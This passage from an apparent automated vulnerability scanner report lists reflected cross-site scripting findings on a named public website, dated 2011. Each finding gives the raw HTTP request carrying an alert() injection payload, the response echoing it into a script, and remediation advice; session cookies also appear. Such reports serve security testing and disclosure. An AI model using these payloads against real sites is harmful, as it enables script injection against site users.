The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3ab"-alert(1)-"412e4b918b2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.308. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.309. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.310. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.311. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/styles.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.312. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.313. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null)";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.314. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.315. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.316. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.317. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
